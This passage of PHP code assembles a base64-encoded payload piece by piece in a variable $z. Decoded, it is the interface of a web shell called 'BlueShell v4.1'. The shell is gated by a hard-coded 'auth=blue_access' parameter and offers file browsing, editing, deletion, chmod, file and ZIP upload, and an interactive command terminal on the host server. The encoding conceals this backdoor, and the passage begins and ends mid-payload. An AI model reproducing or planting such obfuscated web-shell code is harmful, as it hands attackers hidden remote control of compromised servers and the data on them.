$z .= "KSI+8J+TpiBVcGxvYWQgWklQPC9idX";
$z .= "R0b24+DQogICAgICAgICAgICAgICAg";
$z .= "PGJ1dHRvbiBjbGFzcz0iYnRuIiBvbm";
$z .= "NsaWNrPSJzaG93TW9kYWwoJ2ZvbGRl";
$z .= "cicpIj7wn5OBIE5ldyBGb2xkZXI8L2";
$z .= "J1dHRvbj4NCiAgICAgICAgICAgICAg";
$z .= "ICA8YnV0dG9uIGNsYXNzPSJidG4iIG";
$z .= "9uY2xpY2s9InNob3dNb2RhbCgnZmls";
$z .= "ZScpIj7wn5OEIE5ldyBGaWxlPC9idX";
$z .= "R0b24+DQogICAgICAgICAgICAgICAg";
$z .= "PGlucHV0IHR5cGU9InRleHQiIGNsYX";
$z .= "NzPSJzZWFyY2gtYm94IiBpZD0ic2Vh";
$z .= "cmNoSW5wdXQiIHBsYWNlaG9sZGVyPS";
$z .= "Lwn5SNIFNlYXJjaCBmaWxlcy4uLiIg";
$z .= "b25rZXl1cD0ic2VhcmNoRmlsZXModG";
$z .= "hpcy52YWx1ZSkiPg0KICAgICAgICAg";
$z .= "ICAgPC9kaXY+DQoNCiAgICAgICAgIC";
$z .= "AgIDx0YWJsZSBjbGFzcz0iZmlsZS10";
$z .= "YWJsZSIgaWQ9ImZpbGVUYWJsZSI+DQ";
$z .= "ogICAgICAgICAgICAgICAgPHRoZWFk";
$z .= "Pg0KICAgICAgICAgICAgICAgICAgIC";
$z .= "A8dHI+PHRoPk5hbWU8L3RoPjx0aCB3";
$z .= "aWR0aD0iMTAwIj5TaXplPC90aD48dG";
$z .= "ggd2lkdGg9IjEwMCI+UGVybXM8L3Ro";
$z .= "Pjx0aCB3aWR0aD0iMTUwIj5Nb2RpZm";
$z .= "llZDwvdGg+PHRoIHdpZHRoPSIzMDAi";
$z .= "PkFjdGlvbnM8L3RoPjwvdHI+DQogIC";
$z .= "AgICAgICAgICAgICAgPC90aGVhZD4N";
$z .= "CiAgICAgICAgICAgICAgICA8dGJvZH";
$z .= "k+DQogICAgICAgICAgICAgICAgICAg";
$z .= "IDw/cGhwIGlmICgkY3VycmVudF9wYX";
$z .= "RoICE9PSBnZXRjd2QoKSk6ID8+DQog";
$z .= "ICAgICAgICAgICAgICAgICAgIDx0cj";
$z .= "48dGQgY29sc3Bhbj0iNSI+PGEgaHJl";
$z .= "Zj0iP2F1dGg9Ymx1ZV9hY2Nlc3MmcG";
$z .= "F0aD08Pz0gdXJsZW5jb2RlKGRpcm5h";
$z .= "bWUoJGN1cnJlbnRfcGF0aCkpID8+Ii";
$z .= "BjbGFzcz0iZmlsZS1uYW1lIj48c3Bh";
$z .= "biBjbGFzcz0iZmlsZS1pY29uIj7wn5";
$z .= "OBPC9zcGFuPjxzcGFuPi4uIChQYXJl";
$z .= "bnQgRGlyZWN0b3J5KTwvc3Bhbj48L2";
$z .= "E+PC90ZD48L3RyPg0KICAgICAgICAg";
$z .= "ICAgICAgICAgICA8P3BocCBlbmRpZj";
$z .= "sgPz4NCiAgICAgICAgICAgICAgICAg";
$z .= "ICAgPD9waHANCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgJGl0ZW1zID0gc2NhbmRp";
$z .= "cigkY3VycmVudF9wYXRoKTsNCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgJGRpcnMg";
$z .= "PSBbXTsNCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgJGZpbGVzID0gW107DQogICAg";
$z .= "ICAgICAgICAgICAgICAgIGZvcmVhY2";
$z .= "ggKCRpdGVtcyBhcyAkaXRlbSkgew0K";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgaWYgKCRpdGVtID09PSAnLicgfHwg";
$z .= "JGl0ZW0gPT09ICcuLicpIGNvbnRpbn";
$z .= "VlOw0KICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgJGZ1bGwgPSAkY3VycmVudF";
$z .= "9wYXRoIC4gJy8nIC4gJGl0ZW07DQog";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "BpZiAoaXNfZGlyKCRmdWxsKSkgJGRp";
$z .= "cnNbXSA9ICRpdGVtOw0KICAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgZWxzZSAk";
$z .= "ZmlsZXNbXSA9ICRpdGVtOw0KICAgIC";
$z .= "AgICAgICAgICAgICAgICB9DQogICAg";
$z .= "ICAgICAgICAgICAgICAgIHNvcnQoJG";
$z .= "RpcnMpOw0KICAgICAgICAgICAgICAg";
$z .= "ICAgICBzb3J0KCRmaWxlcyk7DQogIC";
$z .= "AgICAgICAgICAgICAgICAgIGZvcmVh";
$z .= "Y2ggKGFycmF5X21lcmdlKCRkaXJzLC";
$z .= "AkZmlsZXMpIGFzICRpdGVtKToNCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "RmdWxsID0gJGN1cnJlbnRfcGF0aCAu";
$z .= "ICcvJyAuICRpdGVtOw0KICAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgJGlzX2Rp";
$z .= "ciA9IGlzX2RpcigkZnVsbCk7DQogIC";
$z .= "AgICAgICAgICAgICAgICAgICAgICAk";
$z .= "c2l6ZSA9ICRpc19kaXIgPyAnLS0nID";
$z .= "ogZm9ybWF0Qnl0ZXMoZmlsZXNpemUo";
$z .= "JGZ1bGwpKTsNCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICRwZXJtcyA9IHN1";
$z .= "YnN0cihzcHJpbnRmKCclbycsIGZpbG";
$z .= "VwZXJtcygkZnVsbCkpLCAtNCk7DQog";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AkbW9kaWZpZWQgPSBkYXRlKCdZLW0t";
$z .= "ZCBIOmk6cycsIGZpbGVtdGltZSgkZn";
$z .= "VsbCkpOw0KICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICAgJGljb24gPSAkaXNfZG";
$z .= "lyID8gJ/Cfk4EnIDogZ2V0RmlsZUlj";
$z .= "b24oJGl0ZW0pOw0KICAgICAgICAgIC";
$z .= "AgICAgICAgICA/Pg0KICAgICAgICAg";
$z .= "ICAgICAgICAgICA8dHI+DQogICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICA8dGQ+";
$z .= "DQogICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgPD9waHAgaWYgKCRpc19k";
$z .= "aXIpOiA/Pg0KICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICA8YSBo";
$z .= "cmVmPSI/YXV0aD1ibHVlX2FjY2Vzcy";
$z .= "ZwYXRoPTw/PSB1cmxlbmNvZGUoJGZ1";
$z .= "bGwpID8+IiBjbGFzcz0iZmlsZS1uYW";
$z .= "1lIj4NCiAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAgIDxzcG";
$z .= "FuIGNsYXNzPSJmaWxlLWljb24iPjw/";
$z .= "PSAkaWNvbiA/Pjwvc3Bhbj4NCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICAgIDxzcGFuPjw/PSBodG";
$z .= "1sc3BlY2lhbGNoYXJzKCRpdGVtKSA/";
$z .= "Pjwvc3Bhbj4NCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgPC9h";
$z .= "Pg0KICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgIDw/cGhwIGVsc2U6ID8+";
$z .= "DQogICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgIDxhIGhyZWY9Ij9h";
$z .= "dXRoPWJsdWVfYWNjZXNzJnZpZXc9PD";
$z .= "89IHVybGVuY29kZSgkZnVsbCkgPz4i";
$z .= "IHRhcmdldD0iX2JsYW5rIiBjbGFzcz";
$z .= "0iZmlsZS1uYW1lIj4NCiAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgIDxzcGFuIGNsYXNzPSJmaWxl";
$z .= "LWljb24iPjw/PSAkaWNvbiA/Pjwvc3";
$z .= "Bhbj4NCiAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAgIDxzcG";
$z .= "FuPjw/PSBodG1sc3BlY2lhbGNoYXJz";
$z .= "KCRpdGVtKSA/Pjwvc3Bhbj4NCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICAgIDxzcGFuIGNsYXNzPS";
$z .= "JmaWxlLXNpemUiPig8Pz0gJHNpemUg";
$z .= "Pz4pPC9zcGFuPg0KICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgICA8";
$z .= "L2E+DQogICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgPD9waHAgZW5kaWY7";
$z .= "ID8+DQogICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICA8L3RkPg0KICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgPHRkPjw/PS";
$z .= "Akc2l6ZSA/PjwvdGQ+DQogICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICA8dGQ+PH";
$z .= "NwYW4gY2xhc3M9InBlcm1zLWJhZGdl";
$z .= "Ij48Pz0gJHBlcm1zID8+PC9zcGFuPj";
$z .= "wvdGQ+DQogICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICA8dGQ+PD89ICRtb2RpZm";
$z .= "llZCA/PjwvdGQ+DQogICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICA8dGQgY2xhc3";
$z .= "M9ImFjdGlvbi1idG5zIj4NCiAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "A8P3BocCBpZiAoISRpc19kaXIpOiA/";
$z .= "Pg0KICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICA8YSBocmVmPSI/";
$z .= "YXV0aD1ibHVlX2FjY2VzcyZ2aWV3PT";
$z .= "w/PSB1cmxlbmNvZGUoJGZ1bGwpID8+";
$z .= "IiB0YXJnZXQ9Il9ibGFuayIgY2xhc3";
$z .= "M9ImFjdGlvbi1idG4iPvCfkYHvuI8g";
$z .= "VmlldzwvYT4NCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgPGEg";
$z .= "aHJlZj0iP2F1dGg9Ymx1ZV9hY2Nlc3";
$z .= "MmZWRpdD08Pz0gdXJsZW5jb2RlKCRm";
$z .= "dWxsKSA/PiIgY2xhc3M9ImFjdGlvbi";
$z .= "1idG4iPuKcj++4jyBFZGl0PC9hPg0K";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICA8YSBocmVmPSI/YXV0";
$z .= "aD1ibHVlX2FjY2VzcyZkb3dubG9hZD";
$z .= "08Pz0gdXJsZW5jb2RlKCRmdWxsKSA/";
$z .= "PiIgY2xhc3M9ImFjdGlvbi1idG4iPu";
$z .= "Ksh++4jyBEb3dubG9hZDwvYT4NCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICA8P3BocCBlbmRpZjsgPz4NCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICA8YnV0dG9uIGNsYXNzPSJhY3Rp";
$z .= "b24tYnRuIiBvbmNsaWNrPSJyZW5hbW";
$z .= "VJdGVtKCc8Pz0gaHRtbHNwZWNpYWxj";
$z .= "aGFycyhhZGRzbGFzaGVzKCRpdGVtKS";
$z .= "kgPz4nKSI+8J+TnSBSZW5hbWU8L2J1";
$z .= "dHRvbj4NCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICA8YnV0dG9uIGNs";
$z .= "YXNzPSJhY3Rpb24tYnRuIiBvbmNsaW";
$z .= "NrPSJjaG1vZEl0ZW0oJzw/PSBodG1s";
$z .= "c3BlY2lhbGNoYXJzKGFkZHNsYXNoZX";
$z .= "MoJGl0ZW0pKSA/PicsICc8Pz0gJHBl";
$z .= "cm1zID8+JykiPvCflJAgQ2htb2Q8L2";
$z .= "J1dHRvbj4NCiAgICAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICA8YSBocmVmPS";
$z .= "I/YXV0aD1ibHVlX2FjY2VzcyZkZWxl";
$z .= "dGU9PD89IHVybGVuY29kZSgkaXRlbS";
$z .= "kgPz4mcGF0aD08Pz0gdXJsZW5jb2Rl";
$z .= "KCRjdXJyZW50X3BhdGgpID8+IiBjbG";
$z .= "Fzcz0iYWN0aW9uLWJ0biBkZWxldGUt";
$z .= "YnRuIiBvbmNsaWNrPSJyZXR1cm4gY2";
$z .= "9uZmlybSgnRGVsZXRlIDw/PSBodG1s";
$z .= "c3BlY2lhbGNoYXJzKCRpdGVtKSA/Pj";
$z .= "8nKSI+8J+Xke+4jyBEZWxldGU8L2E+";
$z .= "DQogICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICA8L3RkPg0KICAgICAgICAgICAg";
$z .= "ICAgICAgICA8L3RyPg0KICAgICAgIC";
$z .= "AgICAgICAgICAgICA8P3BocCBlbmRm";
$z .= "b3JlYWNoOyA/Pg0KICAgICAgICAgIC";
$z .= "AgICAgIDwvdGJvZHk+DQogICAgICAg";
$z .= "ICAgICAgPC90YWJsZT4NCg0KICAgIC";
$z .= "AgICAgICAgPGRpdiBjbGFzcz0ic3lz";
$z .= "dGVtLWluZm8iPg0KICAgICAgICAgIC";
$z .= "AgICAgIDxkaXYgY2xhc3M9ImluZm8t";
$z .= "aXRlbSI+PHNwYW4gY2xhc3M9ImluZm";
$z .= "8tbGFiZWwiPvCfkr4gRnJlZSBTcGFj";
$z .= "ZTo8L3NwYW4+PHNwYW4+PD89IGRpc2";
$z .= "tfZnJlZV9zcGFjZSgkY3VycmVudF9w";
$z .= "YXRoKSA/IGZvcm1hdEJ5dGVzKGRpc2";
$z .= "tfZnJlZV9zcGFjZSgkY3VycmVudF9w";
$z .= "YXRoKSkgOiAnTi9BJyA/Pjwvc3Bhbj";
$z .= "48L2Rpdj4NCiAgICAgICAgICAgICAg";
$z .= "ICA8ZGl2IGNsYXNzPSJpbmZvLWl0ZW";
$z .= "0iPjxzcGFuIGNsYXNzPSJpbmZvLWxh";
$z .= "YmVsIj7wn5OBIFRvdGFsIEl0ZW1zOj";
$z .= "wvc3Bhbj48c3Bhbj48Pz0gY291bnQo";
$z .= "JGRpcnMpICsgY291bnQoJGZpbGVzKS";
$z .= "A/Pjwvc3Bhbj48L2Rpdj4NCiAgICAg";
$z .= "ICAgICAgICAgICA8ZGl2IGNsYXNzPS";
$z .= "JpbmZvLWl0ZW0iPjxzcGFuIGNsYXNz";
$z .= "PSJpbmZvLWxhYmVsIj7wn5OBIFdyaX";
$z .= "RhYmxlOjwvc3Bhbj48c3Bhbj48Pz0g";
$z .= "aXNfd3JpdGFibGUoJGN1cnJlbnRfcG";
$z .= "F0aCkgPyAn4pyFJyA6ICfinYwnID8+";
$z .= "PC9zcGFuPjwvZGl2Pg0KICAgICAgIC";
$z .= "AgICAgICAgIDxkaXYgY2xhc3M9Imlu";
$z .= "Zm8taXRlbSI+PHNwYW4gY2xhc3M9Im";
$z .= "luZm8tbGFiZWwiPvCflZIgU2VydmVy";
$z .= "IFRpbWU6PC9zcGFuPjxzcGFuPjw/PS";
$z .= "BkYXRlKCdZLW0tZCBIOmk6cycpID8+";
$z .= "PC9zcGFuPjwvZGl2Pg0KICAgICAgIC";
$z .= "AgICAgPC9kaXY+DQogICAgICAgIDwv";
$z .= "ZGl2Pg0KDQogICAgICAgIDwhLS0gVG";
$z .= "VybWluYWwgVGFiIC0tPg0KICAgICAg";
$z .= "ICA8ZGl2IGlkPSJ0ZXJtaW5hbC10YW";
$z .= "IiIGNsYXNzPSJ0YWItY29udGVudCI+";
$z .= "DQogICAgICAgICAgICA8ZGl2IGNsYX";
$z .= "NzPSJ0ZXJtaW5hbCI+DQogICAgICAg";
$z .= "ICAgICAgICAgPGRpdiBjbGFzcz0idG";
$z .= "VybWluYWwtaGVhZGVyIj4NCiAgICAg";
$z .= "ICAgICAgICAgICAgICAgPHNwYW4gY2";
$z .= "xhc3M9InRlcm1pbmFsLXRpdGxlIj7i";
$z .= "mqEgSW50ZXJhY3RpdmUgVGVybWluYW";
$z .= "w8L3NwYW4+DQogICAgICAgICAgICAg";
$z .= "ICAgICAgIDxzcGFuIGNsYXNzPSJ0ZX";
$z .= "JtaW5hbC1jd2QiIGlkPSJjdXJyZW50";
$z .= "Q3dkIj48Pz0gaHRtbHNwZWNpYWxjaG";
$z .= "FycygkY3VycmVudF9wYXRoKSA/Pjwv";
$z .= "c3Bhbj4NCiAgICAgICAgICAgICAgIC";
$z .= "A8L2Rpdj4NCiAgICAgICAgICAgICAg";
$z .= "ICA8ZGl2IGNsYXNzPSJ0ZXJtaW5hbC";
$z .= "1vdXRwdXQiIGlkPSJ0ZXJtaW5hbE91";
$z .= "dHB1dCI+DQogICAgICAgICAgICAgIC";
$z .= "AgICAgIDxwcmU+Qmx1ZVNoZWxsIHY0";
$z .= "LjEgLSBFbmhhbmNlZCBJbnRlcmFjdG";
$z .= "l2ZSBUZXJtaW5hbCBSZWFkeTwvcHJl";
$z .= "Pg0KICAgICAgICAgICAgICAgIDwvZG";
$z .= "l2Pg0KICAgICAgICAgICAgICAgIDxk";
$z .= "aXYgY2xhc3M9InRlcm1pbmFsLWlucH";
$z .= "V0LWFyZWEiPg0KICAgICAgICAgICAg";
$z .= "ICAgICAgICA8c3BhbiBjbGFzcz0idG";
$z .= "VybWluYWwtcHJvbXB0Ij4kPC9zcGFu";
$z .= "Pg0KICAgICAgICAgICAgICAgICAgIC";
$z .= "A8aW5wdXQgdHlwZT0idGV4dCIgY2xh";
$z .= "c3M9InRlcm1pbmFsLWlucHV0IiBpZD";
$z .= "0iY21kSW5wdXQiIHBsYWNlaG9sZGVy";
$z .= "PSJFbnRlciBjb21tYW5kLi4uIiBhdX";
$z .= "RvZm9jdXM+DQogICAgICAgICAgICAg";
$z .= "ICAgICAgIDxidXR0b24gY2xhc3M9Im";
$z .= "J0biBidG4tcHJpbWFyeSIgb25jbGlj";
$z .= "az0icnVuQ29tbWFuZCgpIj5SdW48L2";
$z .= "J1dHRvbj4NCiAgICAgICAgICAgICAg";
$z .= "ICAgICAgPGJ1dHRvbiBjbGFzcz0iYn";
$z .= "RuIiBvbmNsaWNrPSJjbGVhclRlcm1p";
$z .= "bmFsKCkiPkNsZWFyPC9idXR0b24+DQ";
$z .= "ogICAgICAgICAgICAgICAgICAgIDxi";
$z .= "dXR0b24gY2xhc3M9ImJ0biIgb25jbG";
$z .= "ljaz0ic3RvcENvbW1hbmQoKSI+4o+5";
$z .= "77iPIFN0b3A8L2J1dHRvbj4NCiAgIC";
$z .= "AgICAgICAgICAgICA8L2Rpdj4NCiAg";
$z .= "ICAgICAgICAgICAgICA8ZGl2IGNsYX";
$z .= "NzPSJxdWljay1jbWRzIj4NCiAgICAg";
$z .= "ICAgICAgICAgICAgICAgPHNwYW4gY2";
$z .= "xhc3M9InF1aWNrLWNtZCIgb25jbGlj";
$z .= "az0ic2V0Q29tbWFuZCgnbHMgLWxhJy";
$z .= "kiPmxzIC1sYTwvc3Bhbj4NCiAgICAg";
$z .= "ICAgICAgICAgICAgICAgPHNwYW4gY2";
$z .= "xhc3M9InF1aWNrLWNtZCIgb25jbGlj";
$z .= "az0ic2V0Q29tbWFuZCgncHdkJykiPn";
$z .= "B3ZDwvc3Bhbj4NCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgPHNwYW4gY2xhc3M9In";
$z .= "F1aWNrLWNtZCIgb25jbGljaz0ic2V0";
$z .= "Q29tbWFuZCgnd2hvYW1pJykiPndob2";
$z .= "FtaTwvc3Bhbj4NCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgPHNwYW4gY2xhc3M9In";
$z .= "F1aWNrLWNtZCIgb25jbGljaz0ic2V0";
$z .= "Q29tbWFuZCgnaWQnKSI+aWQ8L3NwYW";
$z .= "4+DQogICAgICAgICAgICAgICAgICAg";
$z .= "IDxzcGFuIGNsYXNzPSJxdWljay1jbW";
$z .= "QiIG9uY2xpY2s9InNldENvbW1hbmQo";
$z .= "J3BocCAtdicpIj5waHAgLXY8L3NwYW";
$z .= "4+DQogICAgICAgICAgICAgICAgICAg";
$z .= "IDxzcGFuIGNsYXNzPSJxdWljay1jbW";
$z .= "QiIG9uY2xpY2s9InNldENvbW1hbmQo";
$z .= "J3VuYW1lIC1hJykiPnVuYW1lIC1hPC";
$z .= "9zcGFuPg0KICAgICAgICAgICAgICAg";
$z .= "ICAgICA8c3BhbiBjbGFzcz0icXVpY2";
$z .= "stY21kIiBvbmNsaWNrPSJzZXRDb21t";
$z .= "YW5kKCdkZiAtaCcpIj5kZiAtaDwvc3";
$z .= "Bhbj4NCiAgICAgICAgICAgICAgICAg";
$z .= "ICAgPHNwYW4gY2xhc3M9InF1aWNrLW";
$z .= "NtZCIgb25jbGljaz0ic2V0Q29tbWFu";
$z .= "ZCgnZnJlZSAtbScpIj5mcmVlIC1tPC";
$z .= "9zcGFuPg0KICAgICAgICAgICAgICAg";
$z .= "IDwvZGl2Pg0KICAgICAgICAgICAgPC";
$z .= "9kaXY+DQogICAgICAgIDwvZGl2Pg0K";
$z .= "DQogICAgICAgIDwhLS0gVXBsb2FkIC";
$z .= "YgWklQIFRhYiAtLT4NCiAgICAgICAg";
$z .= "PGRpdiBpZD0idXBsb2FkLXRhYiIgY2";
$z .= "xhc3M9InRhYi1jb250ZW50Ij4NCiAg";
$z .= "ICAgICAgICAgIDxkaXYgc3R5bGU9Im";
$z .= "Rpc3BsYXk6IGdyaWQ7IGdyaWQtdGVt";
$z .= "cGxhdGUtY29sdW1uczogcmVwZWF0KG";
$z .= "F1dG8tZml0LCBtaW5tYXgoMzAwcHgs";
$z .= "IDFmcikpOyBnYXA6IDIwcHg7Ij4NCi";
$z .= "AgICAgICAgICAgICAgICA8ZGl2IHN0";
$z .= "eWxlPSJiYWNrZ3JvdW5kOiByZ2JhKD";
$z .= "EwLCAyNSwgNDcsIDAuOCk7IGJvcmRl";
$z .= "ci1yYWRpdXM6IDE2cHg7IGJvcmRlcj";
$z .= "ogMXB4IHNvbGlkIHJnYmEoMzMsMTUw";
$z .= "LDI0MywwLjQpOyBwYWRkaW5nOiAyNX";
$z .= "B4OyBiYWNrZHJvcC1maWx0ZXI6IGJs";
$z .= "dXIoMTBweCk7Ij4NCiAgICAgICAgIC";
$z .= "AgICAgICAgICAgPGgzIHN0eWxlPSJj";
$z .= "b2xvcjogdmFyKC0tcHJpbWFyeS1saW";
$z .= "dodCk7IG1hcmdpbi1ib3R0b206IDIw";
$z .= "cHg7Ij7wn5OkIFVwbG9hZCBGaWxlPC";
$z .= "9oMz4NCiAgICAgICAgICAgICAgICAg";
$z .= "ICAgPGZvcm0gbWV0aG9kPSJQT1NUIi";
$z .= "BlbmN0eXBlPSJtdWx0aXBhcnQvZm9y";
$z .= "bS1kYXRhIj4NCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgIDxpbnB1dCB0eXBl";
$z .= "PSJmaWxlIiBuYW1lPSJ1cGxvYWQiIG";
$z .= "NsYXNzPSJtb2RhbC1pbnB1dCIgcmVx";
$z .= "dWlyZWQ+DQogICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICA8YnV0dG9uIHR5cGU9";
$z .= "InN1Ym1pdCIgY2xhc3M9ImJ0biBidG";
$z .= "4tcHJpbWFyeSIgc3R5bGU9IndpZHRo";
$z .= "OiAxMDAlOyI+VXBsb2FkIEZpbGU8L2";
$z .= "J1dHRvbj4NCiAgICAgICAgICAgICAg";
$z .= "ICAgICAgPC9mb3JtPg0KICAgICAgIC";
$z .= "AgICAgICAgIDwvZGl2Pg0KICAgICAg";
$z .= "ICAgICAgICAgIDxkaXYgc3R5bGU9Im";
$z .= "JhY2tncm91bmQ6IHJnYmEoMTAsIDI1";
$z .= "LCA0NywgMC44KTsgYm9yZGVyLXJhZG";
$z .= "l1czogMTZweDsgYm9yZGVyOiAxcHgg";
$z .= "c29saWQgcmdiYSgzMywxNTAsMjQzLD";
$z .= "AuNCk7IHBhZGRpbmc6IDI1cHg7IGJh";
$z .= "Y2tkcm9wLWZpbHRlcjogYmx1cigxMH";
$z .= "B4KTsiPg0KICAgICAgICAgICAgICAg";
$z .= "ICAgICA8aDMgc3R5bGU9ImNvbG9yOi";
$z .= "B2YXIoLS1wcmltYXJ5LWxpZ2h0KTsg";
$z .= "bWFyZ2luLWJvdHRvbTogMjBweDsiPv";
$z .= "Cfk6YgVXBsb2FkICYgRXh0cmFjdCBa";
$z .= "SVA8L2gzPg0KICAgICAgICAgICAgIC";
$z .= "AgICAgICA8Zm9ybSBtZXRob2Q9IlBP";
$z .= "U1QiIGVuY3R5cGU9Im11bHRpcGFydC";
$z .= "9mb3JtLWRhdGEiPg0KICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgPGlucHV0IH";
$z .= "R5cGU9ImZpbGUiIG5hbWU9InppcF91";
$z .= "cGxvYWQiIGFjY2VwdD0iLnppcCIgY2";
$z .= "xhc3M9Im1vZGFsLWlucHV0IiByZXF1";
$z .= "aXJlZD4NCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgIDxpbnB1dCB0eXBlPSJ0";
$z .= "ZXh0IiBuYW1lPSJleHRyYWN0X3BhdG";
$z .= "giIGNsYXNzPSJtb2RhbC1pbnB1dCIg";
$z .= "cGxhY2Vob2xkZXI9IkV4dHJhY3QgdG";
$z .= "8gKG9wdGlvbmFsKSI+DQogICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICA8YnV0dG";
$z .= "9uIHR5cGU9InN1Ym1pdCIgY2xhc3M9";
$z .= "ImJ0biBidG4tc3VjY2VzcyIgc3R5bG";
$z .= "U9IndpZHRoOiAxMDAlOyI+VXBsb2Fk";
$z .= "ICYgRXh0cmFjdDwvYnV0dG9uPg0KIC";
$z .= "AgICAgICAgICAgICAgICAgICA8L2Zv";
$z .= "cm0+DQogICAgICAgICAgICAgICAgPC";
$z .= "9kaXY+DQogICAgICAgICAgICA8L2Rp";
$z .= "dj4NCiAgICAgICAgPC9kaXY+DQogIC";
$z .= "AgICAgIDw/cGhwIGVuZGlmOyA/Pg0K";
$z .= "ICAgIDwvZGl2Pg0KDQogICAgPCEtLS";
$z .= "BNb2RhbHMgLS0+DQogICAgPGRpdiBj";
$z .= "bGFzcz0ibW9kYWwiIGlkPSJ1cGxvYW";
$z .= "RNb2RhbCI+PGRpdiBjbGFzcz0ibW9k";
$z .= "YWwtY29udGVudCI+PGRpdiBjbGFzcz";
$z .= "0ibW9kYWwtdGl0bGUiPvCfk6QgVXBs";
$z .= "b2FkIEZpbGU8L2Rpdj48Zm9ybSBtZX";
$z .= "Rob2Q9IlBPU1QiIGVuY3R5cGU9Im11";
$z .= "bHRpcGFydC9mb3JtLWRhdGEiPjxpbn";
$z .= "B1dCB0eXBlPSJmaWxlIiBuYW1lPSJ1";
$z .= "cGxvYWQiIGNsYXNzPSJtb2RhbC1pbn";
$z .= "B1dCIgcmVxdWlyZWQ+PGRpdiBjbGFz";
$z .= "cz0ibW9kYWwtYnV0dG9ucyI+PGJ1dH";
$z .= "RvbiB0eXBlPSJidXR0b24iIGNsYXNz";
$z .= "PSJidG4iIG9uY2xpY2s9ImhpZGVNb2";
$z .= "RhbCgndXBsb2FkJykiPkNhbmNlbDwv";
$z .= "YnV0dG9uPjxidXR0b24gdHlwZT0ic3";
$z .= "VibWl0IiBjbGFzcz0iYnRuIGJ0bi1w";
$z .= "cmltYXJ5Ij5VcGxvYWQ8L2J1dHRvbj";
$z .= "48L2Rpdj48L2Zvcm0+PC9kaXY+PC9k";
$z .= "aXY+DQogICAgPGRpdiBjbGFzcz0ibW";
$z .= "9kYWwiIGlkPSJ6aXBNb2RhbCI+PGRp";
$z .= "diBjbGFzcz0ibW9kYWwtY29udGVudC";
$z .= "I+PGRpdiBjbGFzcz0ibW9kYWwtdGl0";
$z .= "bGUiPvCfk6YgVXBsb2FkIFpJUDwvZG";
$z .= "l2Pjxmb3JtIG1ldGhvZD0iUE9TVCIg";
$z .= "ZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm";
$z .= "0tZGF0YSI+PGlucHV0IHR5cGU9ImZp";
$z .= "bGUiIG5hbWU9InppcF91cGxvYWQiIG";
$z .= "FjY2VwdD0iLnppcCIgY2xhc3M9Im1v";
$z .= "ZGFsLWlucHV0IiByZXF1aXJlZD48aW";
$z .= "5wdXQgdHlwZT0idGV4dCIgbmFtZT0i";
$z .= "ZXh0cmFjdF9wYXRoIiBjbGFzcz0ibW";
$z .= "9kYWwtaW5wdXQiIHBsYWNlaG9sZGVy";
$z .= "PSJFeHRyYWN0IHRvIj48ZGl2IGNsYX";
$z .= "NzPSJtb2RhbC1idXR0b25zIj48YnV0";
$z .= "dG9uIHR5cGU9ImJ1dHRvbiIgY2xhc3";
$z .= "M9ImJ0biIgb25jbGljaz0iaGlkZU1v";
$z .= "ZGFsKCd6aXAnKSI+Q2FuY2VsPC9idX";
$z .= "R0b24+PGJ1dHRvbiB0eXBlPSJzdWJt";
$z .= "aXQiIGNsYXNzPSJidG4gYnRuLXN1Y2";
$z .= "Nlc3MiPlVwbG9hZDwvYnV0dG9uPjwv";
$z .= "ZGl2PjwvZm9ybT48L2Rpdj48L2Rpdj";
$z .= "4NCiAgICA8ZGl2IGNsYXNzPSJtb2Rh";
$z .= "bCIgaWQ9ImZvbGRlck1vZGFsIj48ZG";
$z .= "l2IGNsYXNzPSJtb2RhbC1jb250ZW50";
